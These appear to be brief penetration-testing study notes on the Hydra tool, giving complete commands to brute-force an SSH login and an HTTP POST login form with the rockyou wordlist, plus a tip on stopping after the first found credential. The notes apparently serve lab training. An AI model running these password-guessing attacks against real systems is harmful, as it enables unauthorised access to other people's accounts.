Hydra
.
- SSH Attack
hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1
- HTTP POST Attack
hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
-f to stop the attack after getting credential- remember, to give all parameters